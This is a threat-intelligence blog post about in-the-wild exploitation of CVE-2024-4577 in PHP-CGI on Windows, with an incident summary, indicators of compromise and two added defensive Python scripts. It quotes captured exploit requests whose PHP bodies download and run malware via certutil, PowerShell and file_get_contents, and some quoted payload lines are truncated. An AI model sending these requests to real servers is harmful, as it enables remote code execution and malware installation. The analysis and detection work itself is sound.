Full Report
## Introduction

It’s been almost a week since DEVCORE published the technical details of CVE-2024-4577, a remote code execution vulnerability in PHP, closely followed by watchTowr’s PoC. Rest assured, our omnipresent sensor fleet has observed some nefarious activity, and this blog post will take a closer look at the few peculiar payloads we’ve seen.

## Background

CVE-2024-4577 is a critical argument-injection vulnerability in PHP that affects Windows deployments and leads to remote code execution when the following conditions are met:

- The OS is running in a specific system locale:
  - Traditional (Code Page 950) or Simplified (Code Page 936) Chinese
  - Japanese (Code Page 932)
- and the PHP executable binary - php.exe or php-cgi.exe - is copied to the CGI directory or exposed via a `ScriptAlias /php-cgi/ "C:/xampp/php/"` directive

This scenario includes all versions of XAMPP installations on Windows (XAMPP is not meant for production use by default) or a Windows machine running Apache HTTP Server with the Action directive configured to map HTTP requests to a PHP-CGI executable binary, for example:

```apache
AddHandler cgi-script .php
Action cgi-script "/cgi-bin/php-cgi.exe"
```

Due to the wide variety of PHP usage scenarios, it’s not entirely possible to eliminate the chance of exploitation in other locales and configurations.

Vulnerable PHP versions:

- 8.3
- PHP branches 8.0, 7, and 5 (all have reached EOL)

The culprit of the vulnerability is the ‘best-fit’ Windows behavior applied during Unicode processing, which in the context of PHP leads to the CGI handler interpreting the soft hyphen 0xAD as a regular hyphen, thus allowing the injection of command-line arguments in the HTTP request - for example `-d allow_url_include=1 -d auto_prepend_file=php://input` followed by PHP code that gets executed:

```http
GET /index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
...
<?php echo "CVE-2024-4577"; ?>
```

In conclusion of this part, two quotes.
Orange Tsai, the author of the original research:

> This vulnerability is incredibly simple, but that’s also what makes it interesting. Who would have thought that a patch, which has been reviewed and proven secure for the past 12 years, could be bypassed due to a minor Windows feature? I believe this feature could lead to more potential vulnerabilities.

VulnCheck, our friends and business partners:

> We’ve also started scanning XAMPP servers on the internet looking for exploitable servers, not just version scans. The results indicate that this will not be widely exploited. XAMPP likely represents the best possibility for widespread vulnerable software (widely deployed, default install is vulnerable assuming the correct locale). But having scanned tens of thousands of Windows XAMPP hosts, we are only seeing something like a 0.50% vulnerable host rate (e.g. in more simple terms, for every 10,000 servers only 50 are vulnerable).

## Payloads

### Exhibit A

```http
POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: <IP_ADDRESS>
Connection: close
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
Content-Length: 37
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux aarch64; rv:90.0) Gecko/20100101 Firefox/90.0

<?php echo md5("CVE-2024-4577"); ?>
```

Unsurprisingly, the most popular payload is a Nuclei template. The scanner expects the MD5 3f2ba4ab3b260f4c2dc61a6fac7c3e8a within the server response as confirmation of RCE being achieved.
We’ve also seen quite a few non-Nuclei variations with different PHP snippets, but with the same basic idea behind them:

- a snippet which seems to be a Python PoC - the echoed string translates to "ten thousand li long wall"
- `/');?>` - certutil is a popular Windows binary that is capable of downloading files, however in this case it seemingly just reaches out to hxxp://185[.]72[.]9[.]5:80/

### Exhibit B

```http
POST /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: <IP_ADDRESS>
Connection: keep-alive
Content-Length: 145
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

<?php $data = file_get_contents( "http:///download/x86.exe" );file_put_contents( "mskrnl.exe", $data );system( "mskrnl.exe");?>
```

This request originated from the comrades at 62[.]204[.]41[.]128, and upon successfully achieving RCE would fetch and execute hxxp://213[.]109[.]202[.]188:80/download/x86.exe, which appears to be a Cobalt Strike beacon that would communicate with hxxp://213[.]109[.]202[.]188/dpixel

Kudos to CERT-EE for reviving the Cuckoo Sandbox 3 and maintaining its public instance:

- File analysis
- URI analysis

### Exhibit C

```http
POST /index.php?%ADd+allow_url_include%3D1+-d+auto_prepend_file%3Dphp://input HTTP/1.1
Host: <IP_ADDRESS>
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Length: 225
User-Agent: python-requests/2.28.2

<?php system('C:\WINDOWS\system32\cmd.exe /k powershell -W Hidden powershell -command Invoke-WebRequest https://github.com/matrix52/1488/raw/main/bot.exe -UseBasicParsing -OutFile TEMP.exe ; Start TEMP.exe')?>;echo 1337; die;
```

The attacker at 176[.]118[.]120[.]251 tried to use PowerShell to download a rather chonky (6.1MB) trojan.python/dbadur malware file hosted on GitHub. Unexpectedly, the malware crashed while running in the Windows 7 sandbox, thus the network-related part is missing from the Cuckoo report.
VirusTotal’s behavioral analysis showed that the malware attempts to perform a DNS lookup for le-shaw[.]gl[.]at[.]ply[.]gg, which is a subdomain of a tunneling service. We were able to decompile the sample and locate a couple of public repositories with very similar code:

- https://github.com/wodxgod/PYbot/blob/master/bot.pyw
- https://github.com/CirqueiraDev/KryptonC2/blob/main/src/Payload/bot.py

### Exhibit D

```http
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1
Host: <IP_ADDRESS>
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 106
Content-Type: application/x-www-form-urlencoded
User-Agent: python-requests/2.27.1

<?php system('certutil.exe -urlcache -f http:///system64.exe bad.exe&start bad.exe');?>
```

Source IPs using this payload:

- 108[.]181[.]2[.]1
- 138[.]201[.]126[.]53
- 205[.]198[.]65[.]18
- 23[.]237[.]182[.]122
- 51[.]158[.]61[.]208

Note how the additional CLI arguments cgi.force_redirect and cgi.redirect_status_env are being injected in the URI. We’ve also observed variations of this payload with different file names:

```
/phps.exe phpsm.exe&start phpsm.exe');?>
/phpab.exe bad.exe&start phpb.exe');?>
/phpab.exe phpb.exe&start phpb.exe');?>
```

The malware gets downloaded from hxxp://154[.]201[.]91[.]59:44557 or hxxp://147[.]50[.]253[.]109:44119, and seems to be a variant of Gh0st RAT. It reaches out to C2 146[.]19[.]100[.]7 on port 8000 upon execution:

- Cuckoo 3 analysis
- VirusTotal analysis

Notes:

- The examples in this blog post are current as of the day of publishing (2024-06-13)
- We’ve yet to observe payloads using data:// instead of php://
- Where applicable, Cuckoo 3 analysis pages contain exportable file samples
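The exhibits above all share one mechanism: a percent-encoded soft hyphen (`%AD`) that Windows best-fit conversion turns into `-`, so the query string reaches php-cgi.exe as `-d` options. The following Python is an added example for defenders, not code from the original post or from any of the tools it mentions. It reconstructs the argument vector php-cgi would see, counts how many soft hyphens were mapped, and flags an injected `-d` that sets one of the INI options seen in the exhibits or points `auto_prepend_file` at `php://input` or (the variant the post expects but has not yet seen) a `data:` wrapper. The sample requests, the `example.invalid` host and the neutral bodies are constructed for this example; the `best_fit` helper only emulates the single 0xAD mapping the post describes, not the full Windows best-fit table.

```python
"""Flag CVE-2024-4577-style argument injection in raw HTTP requests.

Added example (not code from the original post): it reconstructs what
php-cgi.exe would receive on its command line by URL-decoding the query
string and applying the one best-fit mapping the post describes (the soft
hyphen 0xAD becoming an ASCII '-'), then looks for an injected '-d' that
sets one of the INI options seen in Exhibits A-D. The sample requests are
constructed for this example and only resemble the observed payloads.
"""
import re
from urllib.parse import unquote_to_bytes

# INI options an injected -d was observed to set (from the post's exhibits).
SUSPICIOUS_INI = {
    "allow_url_include",
    "auto_prepend_file",
    "cgi.force_redirect",
    "cgi.redirect_status_env",
}
# Stream wrappers that turn the request body into executable PHP; data:// is
# the variant the post says it has not observed yet.
SUSPICIOUS_STREAMS = ("php://input", "data:")


def best_fit(raw: bytes) -> str:
    """Emulate the relevant part of Windows best-fit conversion: 0xAD -> '-'."""
    return raw.replace(b"\xad", b"-").decode("latin-1")


def analyse(raw_request: str) -> dict:
    """Classify one raw HTTP request (request line, headers, optional body)."""
    parts = re.split(r"\r?\n\r?\n", raw_request, maxsplit=1)
    head, body = parts[0], (parts[1] if len(parts) > 1 else "")
    request_line = head.splitlines()[0] if head else ""
    fields = request_line.split(" ")
    target = fields[1] if len(fields) > 1 else ""
    query = target.split("?", 1)[1] if "?" in target else ""
    # '+' separates the injected argv tokens in the observed payloads, so treat
    # it as a space before percent-decoding, as form-encoded query strings do.
    raw = unquote_to_bytes(query.replace("+", " "))
    soft_hyphens = raw.count(b"\xad")
    argv = best_fit(raw).split(" ") if raw else []
    # Every '-d' token consumes the next token as a php.ini setting.
    settings = [argv[i + 1] for i, tok in enumerate(argv[:-1]) if tok == "-d"]
    ini_hits = [s for s in settings if s.split("=", 1)[0] in SUSPICIOUS_INI]
    stream_hits = [s for s in settings if any(w in s for w in SUSPICIOUS_STREAMS)]
    if ini_hits or stream_hits:
        verdict = "exploit-attempt"
    elif soft_hyphens:
        # A lone soft hyphen in a query string is unusual but not proof of abuse.
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {
        "verdict": verdict,
        "argv": argv,
        "soft_hyphens": soft_hyphens,
        "settings": settings,
        "php_in_body": "<?php" in body,
    }


def scan(requests: dict) -> dict:
    """Map each named sample request to its verdict."""
    return {name: analyse(req)["verdict"] for name, req in requests.items()}


# Constructed samples: the query strings follow the shapes of Exhibits A and C
# plus the expected data:// variant, with neutral bodies and a placeholder host.
SAMPLES = {
    "exhibit_a_like": (
        "POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env"
        "+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1\r\n"
        "Host: example.invalid\r\n\r\n"
        '<?php echo md5("CVE-2024-4577"); ?>'
    ),
    "exhibit_c_like": (
        "POST /index.php?%ADd+allow_url_include%3D1+-d+auto_prepend_file%3Dphp://input HTTP/1.1\r\n"
        "Host: example.invalid\r\n\r\n"
        "<?php echo 1337; ?>"
    ),
    "data_wrapper": (
        "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3D1"
        "+%ADd+auto_prepend_file%3Ddata://text/plain,x HTTP/1.1\r\n"
        "Host: example.invalid\r\n\r\n"
    ),
    "benign": "GET /index.php?page=about&lang=en-US HTTP/1.1\r\nHost: example.invalid\r\n\r\n",
    "soft_hyphen_only": "GET /index.php?q=co%ADoperation HTTP/1.1\r\nHost: example.invalid\r\n\r\n",
}

if __name__ == "__main__":
    for name, result in scan(SAMPLES).items():
        print(f"{name:18} {result}")
```

Note that Exhibit C mixes a best-fit `%ADd` with a literal `-d`; the check works on the reconstructed argv rather than on the `%AD` byte alone, so that mixed form is caught too, while a stray soft hyphen in an ordinary parameter only rates as suspicious.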
Analysis Summary
# Incident Report: Mass Exploitation Attempts Targeting CVE-2024-4577 in PHP
## Executive Summary
Starting shortly after public disclosure, numerous attacker-controlled systems began actively scanning and attempting to exploit CVE-2024-4577, a critical Remote Code Execution (RCE) vulnerability in PHP installations on Windows systems, particularly affecting XAMPP environments. Observed activity ranges from automated vulnerability scanning (Nuclei) to deployment of sophisticated malware, including Cobalt Strike beacons and Gh0st RAT variants. Response actions documented involve automated detection via sensor fleets and subsequent sandbox analysis (Cuckoo) to profile attacker activity and deployed malware.
## Incident Details
- Discovery Date: Approximately one week after DEVCORE published technical details (around June 6, 2024).
- Incident Date: Ongoing scanning and exploitation observable as of the publishing date (2024-06-13).
- Affected Organization: Not applicable (Observations across the public internet by sensor fleet).
- Sector: Critical Infrastructure / Web Services (Any Windows host running vulnerable PHP/CGI configuration).
- Geography: Global (Inferred from sensor data).
## Timeline of Events
*Note: Exact times are unavailable; timeline reflects the period immediately following public disclosure.*
### Initial Access
- **Date/Time:** Shortly after June 6, 2024 (Following public disclosure by DEVCORE and PoC release by watchTowr).
- **Vector:** Remote Code Execution (RCE) via HTTP requests targeting misconfigured PHP CGI handlers on Windows systems (e.g., XAMPP deployments).
- **Details:** Attackers crafted specific HTTP requests injecting command-line arguments into the URI via the soft hyphen (%AD) substitution vulnerability.
### Lateral Movement
- **Details:** Observed payloads included techniques to download and execute secondary payloads using native Windows binaries like `certutil` or direct file download/execution commands within the PHP execution context.
- Exhibit B: Download and execute `mskrnl.exe` (Cobalt Strike beacon).
- Exhibit C: Download and execute `bot.exe` (Trojan/Malware).
- Exhibit D: Download and execute Gh0st RAT variant via `certutil.exe`.
### Data Exfiltration/Impact
- **Details:** The immediate impact is confirmed **Remote Code Execution** on vulnerable systems.
- Exhibit B suggests communication with a Cobalt Strike C2 server (`hxxp://213[.]109[.]202[.]188/dpixel`).
- Exhibit C malware attempts DNS lookup to a tunneling service (`le-shaw[.]gl[.]at[.]ply[.]gg`).
- Exhibit D malware (Gh0st RAT) communicates with C2 at `146[.]19[.]100[.]7` on port 8000.
### Detection & Response
- **Detection:** Observed by an "omnipresent sensor fleet" monitoring nefarious activity related to the published CVE. Successful exploitation attempts confirmed via specific response signatures (e.g., Nuclei expecting MD5 `3f2ba4ab3b260f4c2dc61a6fac7c3e8a`).
- **Response Actions:** Sandbox analysis employing Cuckoo Sandbox 3 was used to detonate and analyze the deployed malware samples from observed traffic (Exhibits B, C, and D).
## Attack Methodology
- **Initial Access:** RCE via Argument Injection in PHP CGI handler, exploiting Windows locale Unicode processing rules using `%AD` substitution to inject arguments (e.g., `-d allow_url_include=1 -d auto_prepend_file=php://input`).
- **Persistence:** Malware samples (Cobalt Strike, Gh0st RAT variant) imply the establishment of persistent C2 communication channels post-execution.
- **Privilege Escalation:** Not explicitly detailed, but RCE grants ability to run commands as the web server user.
- **Defense Evasion:** Use of native Windows binaries (`certutil.exe`, PowerShell) for file download helps blend with legitimate system activity (Living off the Land - LoLBins).
- **Credential Access:** Not explicitly detailed in the observed payloads.
- **Discovery:** Initial reconnaissance consisted of broad automated scanning (Nuclei), followed by C2 communication probing by the deployed malware.
- **Lateral Movement:** Implied through the deployment of full-featured malware like Cobalt Strike and Gh0st RAT.
- **Collection:** Malware samples analyzed showed intent for data gathering (as typical for RATs/Beacons).
- **Exfiltration:** Malware attempts to establish communication channels for command and control, likely leading to data exfiltration.
- **Impact:** Delivery and execution of secondary malware payload (backdoors/RATs) on vulnerable Windows servers.
## Impact Assessment
- **Financial:** Not calculated, but high potential cost associated with clean-up from RAT/Beacon infection.
- **Data Breach:** Potential for significant data exposure depending on the specific compromised system and the capabilities of the deployed malware (Cobalt Strike/Gh0st RAT).
- **Operational:** Disruption caused by successful deployment of remote access tools on targeted servers. The relative rarity (0.50% vulnerability rate in XAMPP scans) mitigates widespread, immediate operational impact, though highly critical for affected hosts.
- **Reputational:** Minimal public impact noted, as this describes ongoing scanning/post-disclosure observations rather than a confirmed breach of a specific entity.
## Indicators of Compromise
- **Network Indicators (Defanged):**
- C2 1: `hxxp://185[.]72[.]9[.]5:80/`
- C2 2 (Cobalt Strike): `hxxp://213[.]109[.]202[.]188:80/download/x86.exe` and C2 URI `hxxp://213[.]109[.]202[.]188/dpixel`
- C2 3 (Trojan/PYbot variant): DNS lookup to `le-shaw[.]gl[.]at[.]ply[.]gg`
- C2 4 (Gh0st RAT): `hxxp://154[.]201[.]91[.]59:44557` or `hxxp://147[.]50[.]253[.]109:44119`, C2 `146[.]19[.]100[.]7` on port 8000.
- **File Indicators:**
- **Exhibit A Confirmation String:** MD5 `3f2ba4ab3b260f4c2dc61a6fac7c3e8a`
- **Exhibit B:** `mskrnl.exe`
- **Exhibit C:** `bot.exe` (6.1MB trojan from GitHub)
- **Exhibit D:** `bad.exe`, `phps.exe`, `phpab.exe` (Gh0st RAT variants)
- **Behavioral Indicators:**
- HTTP requests containing URL-encoded soft hyphens (`%AD`) standing in for the hyphen of php-cgi flags (`%ADd` for `-d`, followed by settings such as `allow_url_include`).
- Use of `php://input` as the source for file contents via `auto_prepend_file`.
## Response Actions
- **Containment Measures:** (Implied from context rather than stated as actions taken by the reporter, but necessary steps): Immediate patching/upgrading of vulnerable PHP versions, and removal of PHP executables from CGI directories if not strictly required and properly configured.
- **Eradication Steps:** Analysis of sandboxed binaries (Cobalt Strike, Gh0st RAT) to create signatures for enterprise detection and removal of confirmed malicious files (`mskrnl.exe`, `bot.exe`, etc.).
- **Recovery Actions:** Systems confirmed compromised must be forensically imaged or rebuilt if RATs are detected, and C2 command servers must be blocked at the perimeter firewall.
## Lessons Learned
- **Complexity of Security:** A small change in underlying OS behavior (Windows locale handling) can bypass years-old security patches, demonstrating that deep system context is required for robust vulnerability assessment.
- **Misconfiguration Risk:** The vulnerability is heavily reliant on common misconfigurations (XAMPP default install, improper Apache `Action` directives), highlighting the risk of non-production software in publicly accessible environments.
- **Threat Actor Swiftness:** Threat actors moved rapidly to weaponize the vulnerability immediately following public disclosure, emphasizing the need for zero-day preparedness even against vulnerabilities disclosed publicly days prior.
## Recommendations
1. **Patch/Upgrade:** Immediately update PHP installations to versions not affected by CVE-2024-4577, or ensure Windows systems are not running vulnerable locales in combination with exposed PHP CGI binaries.
2. **Configuration Review:** Review Apache configurations (`Action` directive) and ensure PHP modules are not accessible via CGI unless absolutely necessary.
3. **Restrict LoLBins:** Implement strong monitoring and restrictions on the use of native binaries like `certutil.exe` and PowerShell for network operations from non-standard parent processes (like the web server process).
4. **Automated Detection Tuning:** Tune detection systems to watch for the characteristic argument injection pattern (`%ADd`) in HTTP requests targeting PHP files.
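Recommendations 1 and 2 boil down to two configuration shapes that are quoted in the report: a `ScriptAlias` exposing the PHP install directory as a CGI path, and an `Action` directive mapping requests to php-cgi.exe, both of which matter most on a system whose code page is one of the three the report lists. The Python below is an added example, not code from the report or from any project, that audits an httpd.conf excerpt for those shapes and rates the findings higher when the caller passes one of the listed code pages (932, 936, 950). The sample configuration, the finding fields and the `audit_httpd_conf` name are all constructed for this example.

```python
"""Audit an Apache httpd.conf for the php-cgi exposure shapes named above.

Added example, not code from the report or from any project: it flags the
two directive shapes the report describes (ScriptAlias exposing the PHP
install directory as CGI, and Action mapping requests to php-cgi.exe or
php.exe) and rates them higher when the system code page is one of the
three the report lists (932, 936, 950). The sample configuration is
constructed for this example.
"""
import re

# Code pages the report names as affected; other locales are not ruled out,
# so a finding on any other code page is still reported, at medium severity.
RISKY_CODEPAGES = {932, 936, 950}
PHP_CGI_BINARY = re.compile(r"php(-cgi)?\.exe", re.IGNORECASE)
PHP_INSTALL_DIR = re.compile(r"[\\/]php[\\/]?$", re.IGNORECASE)


def audit_httpd_conf(text: str, system_codepage=None) -> list:
    """Return findings as dicts with keys line, directive, reason, severity."""
    severity = "high" if system_codepage in RISKY_CODEPAGES else "medium"
    findings = []
    addhandler_lines = []
    action_maps_to_php = False
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        tokens = stripped.split()
        directive = tokens[0].lower()
        if directive == "scriptalias" and len(tokens) >= 3:
            if PHP_INSTALL_DIR.search(tokens[2].strip('"')):
                findings.append({"line": lineno, "directive": "ScriptAlias",
                                 "reason": "exposes the PHP install directory as a CGI path",
                                 "severity": severity})
        elif directive == "action" and len(tokens) >= 3:
            if PHP_CGI_BINARY.search(tokens[2]):
                action_maps_to_php = True
                findings.append({"line": lineno, "directive": "Action",
                                 "reason": "maps a handler to the PHP CGI binary",
                                 "severity": severity})
        elif directive == "addhandler" and len(tokens) >= 3:
            if tokens[1].lower() == "cgi-script" and ".php" in [t.lower() for t in tokens[2:]]:
                addhandler_lines.append(lineno)
    # AddHandler cgi-script .php is only a problem together with an Action that
    # points at php-cgi.exe, so it is reported after the full pass.
    if action_maps_to_php:
        for lineno in addhandler_lines:
            findings.append({"line": lineno, "directive": "AddHandler",
                             "reason": "routes .php requests to the CGI handler mapped to php-cgi.exe",
                             "severity": severity})
    return sorted(findings, key=lambda f: f["line"])


# Constructed sample, modelled on the directive shapes quoted in the report.
SAMPLE_CONF = """\
# constructed httpd.conf excerpt
ScriptAlias /cgi-bin/ "C:/xampp/cgi-bin/"
ScriptAlias /php-cgi/ "C:/xampp/php/"
AddHandler cgi-script .php
Action cgi-script "/cgi-bin/php-cgi.exe"
"""

if __name__ == "__main__":
    for f in audit_httpd_conf(SAMPLE_CONF, system_codepage=932):
        print(f"line {f['line']}: {f['directive']} {f['reason']} [{f['severity']}]")
```

The configuration alone cannot tell whether php-cgi.exe has simply been copied into a generic cgi-bin directory (the first condition the report names), so this audit should be paired with a listing of the CGI directories themselves; the code page is supplied by the caller rather than detected here.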